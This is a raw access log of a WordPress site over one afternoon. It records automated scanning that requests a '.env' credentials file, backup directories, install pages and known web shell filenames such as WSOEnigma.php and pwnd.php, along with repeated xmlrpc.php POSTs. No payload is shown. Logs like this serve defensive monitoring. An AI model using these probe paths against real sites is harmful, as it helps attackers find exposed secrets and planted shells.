196.251.88.242 - - [01/Apr/2025:12:37:07 -0400] "GET /wp.php HTTP/1.1" 404 16545 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
198.54.114.83 - - [01/Apr/2025:12:56:24 -0400] "POST /wp-cron.php?doing_wp_cron=1743526584.7407701015472412109375 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://shahmeenaindustry.com"
13.229.78.155 - - [01/Apr/2025:12:56:21 -0400] "GET /wp-cli.php HTTP/1.1" 404 16545 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.118.228 - - [01/Apr/2025:12:59:46 -0400] "GET /.env HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
198.54.114.83 - - [01/Apr/2025:13:30:30 -0400] "POST /wp-cron.php?doing_wp_cron=1743528629.8973650932312011718750 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://shahmeenaindustry.com"
198.54.120.73 - - [01/Apr/2025:13:30:24 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://shahmeenaindustry.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:128.0) Gecko/20100101 Firefox/128.0"
13.229.78.155 - - [01/Apr/2025:13:53:22 -0400] "GET /wp-includes/ID3/index.php HTTP/1.1" 301 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:13:53:24 -0400] "GET /wp-includes/ID3/ HTTP/1.1" 403 1242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:13:53:25 -0400] "GET /wp-content/plugins/index.php HTTP/1.1" 200 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:13:53:26 -0400] "GET /wp-admin/network/index.php HTTP/1.1" 302 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:13:53:31 -0400] "GET /wp-includes/IXR/index.php HTTP/1.1" 301 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:13:53:32 -0400] "GET /wp-includes/IXR/ HTTP/1.1" 403 1242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:13:53:33 -0400] "GET /wp-admin/images/index.php HTTP/1.1" 301 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:13:53:35 -0400] "GET /wp-admin/images/ HTTP/1.1" 403 1242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:13:53:37 -0400] "GET /wp-login.php HTTP/1.1" 302 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:13:53:40 -0400] "GET /wp-content/plugins/admin.php HTTP/1.1" 404 16545 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:13:53:42 -0400] "GET /xmlrpc.php HTTP/1.1" 405 60 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:13:53:44 -0400] "GET /wp-admin.php HTTP/1.1" 404 16545 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:13:53:46 -0400] "GET /wp-content/plugins/Core-Econ/upH.php HTTP/1.1" 404 16545 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:13:53:47 -0400] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 404 16545 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:13:53:49 -0400] "GET /wp-content/plugins/pwnd/pwnd.php HTTP/1.1" 404 16545 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:13:53:51 -0400] "GET /wp-content/plugins/shell/noimg.php HTTP/1.1" 404 16545 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:13:53:54 -0400] "GET /WSOEnigma.php HTTP/1.1" 404 16545 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:13:53:55 -0400] "GET /wp-content/plugins/pwnd-1/pwnd.php HTTP/1.1" 404 16545 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
198.54.114.83 - - [01/Apr/2025:13:53:58 -0400] "POST /wp-cron.php?doing_wp_cron=1743530037.9813969135284423828125 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://shahmeenaindustry.com"
13.229.78.155 - - [01/Apr/2025:13:53:57 -0400] "GET /wp-content/plugins/dummyyummy/wp-signup.php HTTP/1.1" 404 16545 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:13:54:00 -0400] "GET /wp-content/plugins/clara/clara.php HTTP/1.1" 404 16545 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
148.72.126.119 - - [01/Apr/2025:13:57:15 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://shahmeenaindustry.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.126 Safari/537.36 Edg/113.0.1774.50"
198.54.114.83 - - [01/Apr/2025:14:23:23 -0400] "POST /wp-cron.php?doing_wp_cron=1743531802.9166290760040283203125 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://shahmeenaindustry.com"
162.0.232.248 - - [01/Apr/2025:14:23:19 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://shahmeenaindustry.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
198.54.114.83 - - [01/Apr/2025:14:48:46 -0400] "POST /wp-cron.php?doing_wp_cron=1743533326.2314519882202148437500 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://shahmeenaindustry.com"
199.188.200.151 - - [01/Apr/2025:14:48:45 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://shahmeenaindustry.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13.3; rv:126.0) Gecko/20100101 Firefox/126.0"
85.208.98.23 - - [01/Apr/2025:14:49:18 -0400] "GET /robots.txt HTTP/1.1" 304 0 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
198.54.114.83 - - [01/Apr/2025:15:07:58 -0400] "POST /wp-cron.php?doing_wp_cron=1743534478.3499450683593750000000 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://shahmeenaindustry.com"
9.169.155.101 - - [01/Apr/2025:15:07:54 -0400] "HEAD /wordpress HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
9.169.155.101 - - [01/Apr/2025:15:07:59 -0400] "HEAD / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
9.169.155.101 - - [01/Apr/2025:15:07:59 -0400] "HEAD /wp HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
9.169.155.101 - - [01/Apr/2025:15:07:59 -0400] "HEAD /bc HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
9.169.155.101 - - [01/Apr/2025:15:08:00 -0400] "HEAD /bk HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
9.169.155.101 - - [01/Apr/2025:15:08:00 -0400] "HEAD /backup HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
9.169.155.101 - - [01/Apr/2025:15:08:01 -0400] "HEAD /old HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
9.169.155.101 - - [01/Apr/2025:15:08:01 -0400] "HEAD /new HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
9.169.155.101 - - [01/Apr/2025:15:08:02 -0400] "HEAD /main HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
9.169.155.101 - - [01/Apr/2025:15:08:03 -0400] "HEAD /home HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
116.204.78.140 - - [01/Apr/2025:15:13:36 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://shahmeenaindustry.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36"
67.223.118.141 - - [01/Apr/2025:15:38:01 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://shahmeenaindustry.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36"
209.97.138.211 - - [01/Apr/2025:15:48:19 -0400] "GET /cbd-shop-uk-review/ HTTP/1.1" 200 23136 "http://shahmeenaindustry.com/cbd-shop-uk-review/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
198.54.114.83 - - [01/Apr/2025:15:48:30 -0400] "POST /wp-cron.php?doing_wp_cron=1743536910.2527439594268798828125 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://shahmeenaindustry.com"
209.97.138.211 - - [01/Apr/2025:15:48:25 -0400] "POST /wp-comments-post.php HTTP/1.1" 200 1166 "http://shahmeenaindustry.com/cbd-shop-uk-review/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
13.229.78.155 - - [01/Apr/2025:15:53:27 -0400] "GET /wp-cli.php HTTP/1.1" 404 16545 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
198.54.114.83 - - [01/Apr/2025:16:01:46 -0400] "POST /wp-cron.php?doing_wp_cron=1743537705.9335460662841796875000 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://shahmeenaindustry.com"
173.212.223.204 - - [01/Apr/2025:16:01:40 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://shahmeenaindustry.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
85.208.98.23 - - [01/Apr/2025:16:15:50 -0400] "GET /robots.txt HTTP/1.1" 200 131 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
198.54.114.83 - - [01/Apr/2025:16:35:05 -0400] "POST /wp-cron.php?doing_wp_cron=1743539705.0428268909454345703125 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://shahmeenaindustry.com"
13.229.78.155 - - [01/Apr/2025:16:35:00 -0400] "GET /wp-includes/ID3/index.php HTTP/1.1" 301 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:16:35:05 -0400] "GET /wp-includes/ID3/ HTTP/1.1" 403 1242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:16:35:06 -0400] "GET /wp-content/plugins/index.php HTTP/1.1" 200 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:16:35:06 -0400] "GET /wp-admin/network/index.php HTTP/1.1" 302 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:16:35:14 -0400] "GET /wp-includes/IXR/index.php HTTP/1.1" 301 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:16:35:15 -0400] "GET /wp-includes/IXR/ HTTP/1.1" 403 1242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:16:35:15 -0400] "GET /wp-admin/images/index.php HTTP/1.1" 301 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:16:35:16 -0400] "GET /wp-admin/images/ HTTP/1.1" 403 1242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:16:35:17 -0400] "GET /wp-login.php HTTP/1.1" 302 0 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:16:35:18 -0400] "GET /wp-content/plugins/admin.php HTTP/1.1" 404 16544 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:16:35:21 -0400] "GET /xmlrpc.php HTTP/1.1" 405 60 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:16:35:22 -0400] "GET /wp-admin.php HTTP/1.1" 404 16543 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:16:35:23 -0400] "GET /wp-content/plugins/Core-Econ/upH.php HTTP/1.1" 404 16544 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:16:35:24 -0400] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 404 16544 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:16:35:26 -0400] "GET /wp-content/plugins/pwnd/pwnd.php HTTP/1.1" 404 16544 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:16:35:27 -0400] "GET /wp-content/plugins/shell/noimg.php HTTP/1.1" 404 16544 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:16:35:28 -0400] "GET /WSOEnigma.php HTTP/1.1" 404 16544 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:16:35:30 -0400] "GET /wp-content/plugins/pwnd-1/pwnd.php HTTP/1.1" 404 16544 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:16:35:31 -0400] "GET /wp-content/plugins/dummyyummy/wp-signup.php HTTP/1.1" 404 16544 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
13.229.78.155 - - [01/Apr/2025:16:35:32 -0400] "GET /wp-content/plugins/clara/clara.php HTTP/1.1" 404 16544 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
43.156.69.138 - - [01/Apr/2025:16:40:21 -0400] "GET //wp-content/plugins/fix/up.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
198.54.114.83 - - [01/Apr/2025:16:40:25 -0400] "POST /wp-cron.php?doing_wp_cron=1743540025.0031459331512451171875 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://shahmeenaindustry.com"
198.54.114.83 - - [01/Apr/2025:16:49:27 -0400] "POST /wp-cron.php?doing_wp_cron=1743540567.2383289337158203125000 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://shahmeenaindustry.com"
47.244.50.243 - - [01/Apr/2025:16:49:26 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://shahmeenaindustry.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0"
93.183.89.12 - - [01/Apr/2025:17:11:38 -0400] "GET /how-to-get-the-most-out-of-a-jade-roller/ HTTP/1.1" 200 21756 "http://shahmeenaindustry.com/how-to-get-the-most-out-of-a-jade-roller/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
198.54.114.83 - - [01/Apr/2025:17:11:42 -0400] "POST /wp-cron.php?doing_wp_cron=1743541902.4158940315246582031250 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://shahmeenaindustry.com"
93.183.89.12 - - [01/Apr/2025:17:11:39 -0400] "POST /wp-comments-post.php HTTP/1.1" 302 0 "http://shahmeenaindustry.com/how-to-get-the-most-out-of-a-jade-roller/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
198.54.114.83 - - [01/Apr/2025:17:13:07 -0400] "POST /wp-cron.php?doing_wp_cron=1743541986.9667840003967285156250 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://shahmeenaindustry.com"
199.188.207.168 - - [01/Apr/2025:17:13:06 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://shahmeenaindustry.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5"
92.255.85.164 - - [01/Apr/2025:17:20:20 -0400] "GET / HTTP/1.1" 200 24560 "http://shahmeenaindustry.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
198.54.114.83 - - [01/Apr/2025:17:37:10 -0400] "POST /wp-cron.php?doing_wp_cron=1743543430.0986759662628173828125 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://shahmeenaindustry.com"
2a02:4780:12:ec93::1 - - [01/Apr/2025:17:37:06 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://shahmeenaindustry.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36"
198.54.114.83 - - [01/Apr/2025:18:01:18 -0400] "POST /wp-cron.php?doing_wp_cron=1743544877.7117710113525390625000 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://shahmeenaindustry.com"
103.7.8.179 - - [01/Apr/2025:18:01:14 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://shahmeenaindustry.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0"
198.54.114.83 - - [01/Apr/2025:18:05:27 -0400] "POST /wp-cron.php?doing_wp_cron=1743545127.0449869632720947265625 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://shahmeenaindustry.com"
13.229.78.155 - - [01/Apr/2025:18:05:26 -0400] "GET /wp-admin/install.php?step=1 HTTP/1.1" 200 523 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:18:05:27 -0400] "GET /wp-admin/setup-config.php HTTP/1.1" 409 1222 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
198.54.114.83 - - [01/Apr/2025:18:05:28 -0400] "POST /wp-cron.php?doing_wp_cron=1743545128.4548211097717285156250 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://shahmeenaindustry.com"
13.229.78.155 - - [01/Apr/2025:18:05:28 -0400] "GET /new/wp-admin/install.php?step=1 HTTP/1.1" 404 16545 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:18:05:29 -0400] "GET /new/wp-admin/setup-config.php HTTP/1.1" 404 16544 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:18:05:31 -0400] "GET /blog/wp-admin/install.php?step=1 HTTP/1.1" 404 16544 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:18:05:32 -0400] "GET /blog/wp-admin/setup-config.php HTTP/1.1" 404 16545 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:18:05:33 -0400] "GET /blogs/wp-admin/install.php?step=1 HTTP/1.1" 404 16545 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:18:05:34 -0400] "GET /blogs/wp-admin/setup-config.php HTTP/1.1" 404 16545 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:18:05:35 -0400] "GET /demo/wp-admin/install.php?step=1 HTTP/1.1" 404 16545 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:18:05:36 -0400] "GET /demo/wp-admin/setup-config.php HTTP/1.1" 404 16545 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:18:05:37 -0400] "GET /wp/wp-admin/install.php?step=1 HTTP/1.1" 404 16545 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:18:05:38 -0400] "GET /wp/wp-admin/setup-config.php HTTP/1.1" 404 16545 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:18:05:39 -0400] "GET /wordpress/wp-admin/install.php?step=1 HTTP/1.1" 404 16545 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:18:05:39 -0400] "GET /wordpress/wp-admin/setup-config.php HTTP/1.1" 404 16544 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:18:05:40 -0400] "GET /tes/wp-admin/install.php?step=1 HTTP/1.1" 404 16544 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
